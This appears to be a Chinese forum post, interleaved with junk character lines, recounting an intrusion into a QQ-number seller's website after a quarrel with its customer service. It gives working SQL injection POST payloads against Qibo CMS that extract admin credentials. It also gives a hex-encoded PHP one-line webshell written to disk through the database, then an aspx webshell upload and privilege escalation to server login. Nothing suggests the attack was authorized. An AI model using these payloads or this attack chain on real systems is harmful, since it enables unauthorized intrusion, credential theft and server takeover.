|
8 M7 D& @+ P, y v
$ G( m9 ^! Y, `$ l: l) ?4 M+ v( K
/ z+ q, v4 y Y/ w, y, r2 o$ Y
2 f! C/ W8 ]' @1 _! P2 y6 G6 v 一、踩点寻找漏洞 # O. k2 ~' p; [: N
闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
6 d, L# h$ O4 R. F: N( X随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下: - e3 j$ p! j. J# E% N
先注册一个用户,记住注册时候的邮箱以uid号,
S; o2 _ N* u( B* S& g/ _
! Z6 j2 ]( i+ l F" }9 ~. |& v
+ w/ h0 y z8 Y3 }( t# b然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
5 C; y; E; {, `' ^. @2 H! H
2 _, ~, e" ]! |1 vtruename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
$ Q6 v1 |* ]1 a z0 a这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图: " j5 Z# m( p5 j+ v/ H
 ! W+ Y0 X8 s l' ^
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
3 z) g. v& J, G" k 9 U* h x l% I V
; J) ]3 ]2 F" m解密进后台如图: & P0 l0 S8 X. Z5 i- ~8 p

; O' D$ q4 u* d5 @( {/ v2 z5 |3 O3 g
: J5 o8 s1 K; B2 F4 l a * O( ?8 V& J/ a6 b* b$ ^+ s+ P3 Z# Q6 i
二、后台getwebshell
3 i- R9 N5 n# P& V4 z进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图: $ d( ?0 y% e- t
5 b* T) l& ^0 `) j5 W! P3 E9 D
 - S2 n& U' M3 C1 b d# _7 N2 n
5 I5 V* |* W% B- ]* y* F; g' t然后点确定,添加提示
* K0 b) w0 r! ]- E+ {
; F/ S5 X* G$ C) X
! B* G% W* c9 x, s. m/ `+ _& G $ f4 Z+ ]' b) K
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图: 4 p# D) a* I; S) @9 G
5 `* H5 x# z3 R8 g
 1 P# w9 w/ k* |5 `% d; k
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
+ _4 V. Q3 N$ ?: x如图: # h1 H/ g, ~* b. |: ]

, J% `% q( ^" W4 l* { * Q7 _" E3 Q+ Y' a( s
: J' j% y" W1 u, w4 U# H之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
/ c+ O5 d( e. ^! a& n/ {& z* B ; w) r' n# k$ Y0 m+ g) u6 f$ k

$ S" Y v" r% P 1 t0 m6 ?6 S K5 M) W( M! \. [
三、提权进服务器
, x0 O3 F9 _4 M9 e% D4 M经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
6 `: D2 @$ f) O6 s/ Z8 i% _ . [$ r! u& M l; w; F% \& ^
' m0 E# u4 ^: |6 U' \4 r
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
2 [3 H: p3 F# ]6 Y/ G
5 c9 `( v$ y% R& c# \2 R 4 S6 [( ~3 o( a* \! M. F/ x
然后登陆服务器如图: 5 I, S' g B3 `+ J" n: n9 r. Z
/ Y8 k" p0 l- {0 q 4 b% n: S U8 _
$ Z1 M7 C9 m* A) T
7 |2 n8 U2 D3 O" O/ Y2 Y' R & p Q: p8 y7 ^0 z, x9 e, Z
难怪普通刀连接不上,原来是有狗。 + m6 v" j* x& ?, I& M$ c5 e2 m
% t4 `; N! y4 S5 G" ~ ( {! _' A* }! R+ u. E
: Y( i+ k, ~0 l4 t( m) t1 p
2 y' y6 {" r; R% j/ E" _, \3 b, ]
7 Z* [0 W% F! q; }" z, U3 @9 f
|